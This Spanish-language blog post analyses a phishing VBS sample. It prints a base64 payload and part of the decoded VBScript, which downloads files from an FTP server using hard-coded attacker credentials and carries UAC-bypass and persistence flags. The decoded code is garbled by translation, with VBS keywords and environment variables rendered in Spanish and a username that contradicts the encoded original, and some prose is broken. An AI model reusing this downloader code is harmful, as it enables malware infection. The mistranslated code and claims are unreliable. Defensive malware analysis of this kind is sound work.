Por Laura Cardillo y Átila Altoé: Este es un análisis de un archivo transformado a lenguaje VBS, siendo este un archivo phishing recibido por correo electrónico desde una cuenta de terceros. El objetivo de este informe no es explicar en detalle cómo funciona el malware en sí, sino presentar una forma de identificar y descifrar la carga útil que lo disemina.
En este informe, demostraremos cómo se realizó el análisis utilizando VBS para identificar y descifrar el código malicioso y la ejecución de este malware.
Vea la acción del malware
La muestra extraída en cuestión se indica a continuación:
Para comenzar el análisis, inspeccionamos el archivo a través de Notepad++ y observamos la presencia de un comando Powershell para decodificar cadenasen base64. Por desgracia, el contenido de destino de este acceso directo es demasiado largo para la ventana de propiedades del archivo. A continuación se muestra la cadena obtenida:
“b24gZXJyb3IgcmVzdW1lIG5leHQNCkRpbSB3aW5zaGVsbA0KU2V0IHdpbnNoZWxsID0gV1NjcmlwdC5DcmVhdGVPYmplY3QoIldTY3JpcHQuU2hlbGwiKQ0KVGltYmFsYXRlID0gInNldHVwLnppcCINClRpbWJhbGF0ZXMgPSAic2V0eC5leGUiDQpVUkwgPSAiZnRwOi8vZnRwLmVzdGFtb3NhaW5hbmEuY29tL3d3dy9pbWFnZW5zLnppcCINClBBQ09URVVTRVIgPSAiZXN0YW1vc2FpbmFuYSINClhBTlBVU0VSID0gInBRTlBlNnZeOTFUWCINCkRpbSBCYWdhbmVGb2xkDQpCYWdhbmVGb2xkID0gd2luc2hlbGwuZXhwYW5kRW52aXJvbm1lbnRTdHJpbmdzKCIlQWxsVXNlcnNQcm9maWxlJSIpDQpEZXN0Rm9sZGVyID0gQmFnYW5lRm9sZCAmICJcU2V0WCINCkRpbSBvYmpXTUlTZXJ2aWNlLCBwcm9jZXNzSXRlbXMsIHByb2Nlc3NOYW1lDQpwcm9jZXNzTmFtZSA9ICJ3c2NyaXB0LmV4ZSINCkRpbSBqb3JkaQ0Kam9yZGkgPSBXU2NyaXB0LlNjcmlwdEZ1bGxOYW1lDQpGT1JDRSA9ICJTSU0iDQpVQUNCWVBBU1MgPSAiTkFPIg0KU2V0IHhtbCA9IENyZWF0ZU9iamVjdChTdHJSZXZlcnNlKCJ0Zm9zb3JjaU0iKSYgIi4iICYgU3RyUmV2ZXJzZSgiUFRUSExNWCIpKQ0Kc2V0IGphcmRpbVhYWFhYWCA9IENyZWF0ZU9iamVjdChQcm9mZXNzb3JhKCJjMCtcNCIsIk4wWCIpICYgIi4iICYgU3RyUmV2ZXJzZSgibm9pdGFjaWxwcEEiKSkNCkNvbnN0IGFkVHlwZUJpbmFyeSA9IDENCkNvbnN0IGFkU2F2ZUNyZWF0ZU92ZXJXcml0ZSA9IDINCkNvbnN0IGFkU2F2ZUNyZ
Como es humanamente imposible entender este tipo de cadena, para descifrarla utilizamos la ayuda de la herramienta cyberchef, con la que encontramos la siguiente función:
en caso de error reanudar siguiente
Dim winshell
Set winshell = WScript.CreateObject("WScript.Shell")
Timbalate = "setup.zip".
Timbalates = "setx.exe"
URL = "ftp://ftp.estamosainana.com/www/imagens.zip"
PACOTEUSER = "nosotros areainana"
XANPUSER = "pQNPe6v^91TX"
Dim BaganeFold
BaganeFold = winshell.expandEnvironmentStrings("%PerfilTodosUsuarios%")
DestFolder = BaganeFolder & "\SetX".
Dim objWMIService, processItems, processName
processName = "wscript.exe"
Dim jordi
jordi = WScript.ScriptNombreCompleto
FORCE = "YES".
UACBYPASS = "NO".
Desde el inicio de la función, se pueden observar algunos puntos de atención como URL, usuario y contraseña referentes a la cuenta que realiza el ataque, o incluso que el atacante utiliza un servidor FTP para difundir los archivos maliciosos, así como el nombre de los archivos que se utilizarán en la infección:
Al seguir discutiendo el papel, también se descubrió que se intentó crear un usuario ("Fisga"). Esto pasó por un proceso de Revertirelevando así sus privilegios y convirtiéndolo en "root".
Por último, también se observa que el malware utiliza una expresión específica al final de la función para realizar la táctica de Persistencia (MITRE ATT&CK) y obliga al usuario a aceptar "root"que se indica a continuación:
Si no
girar
exec
Fin If
ElseIf UACBYPASS = "YES" Then
girar
execc
Si no
girar
exec
Fin If
Fin de la función
Recomendaciones
El primer consejo importante que debe tener en cuenta es que la mayoría de las empresas de confianza no solicitan información personal ni datos de cuentas por correo electrónico. Esto incluye su banco, compañías de seguros y cualquier empresa con la que haga negocios. Si recibes un correo electrónico en el que te piden cualquier tipo de información sobre tu cuenta, elimínalo inmediatamente y llama a la empresa para confirmar que tu cuenta es segura.
- No abra los archivos adjuntos de estos correos electrónicos sospechosos o extraños, especialmente los archivos adjuntos de Word, Excel, PowerPoint o PDF.
- Un consejo útil para prevenir el phishing es evitar siempre hacer clic en enlaces incrustados en correos electrónicos, ya que pueden estar cargados de malware.
- Otra forma de reducir la exposición a los mensajes de phishing es utilizar programas antivirus y antispam.
Por último, es fundamental utilizar un gestor de contraseñas para gestionar las credenciales. Es recomendable disponer de un gestor de contraseñas, ya que los atacantes malintencionados intentarán utilizar las credenciales descubiertas en toda la Web. Una de las mejores características de los gestores de contraseñas es el autorellenado de formularios de inicio de sesión para minimizar los clics.
Referencias
- Archivo recibido a través de honeypot y uso de herramientas Open source.
- https://www.kaspersky.com.br/resource-center/preemptive-safety/phishing-prevention-tips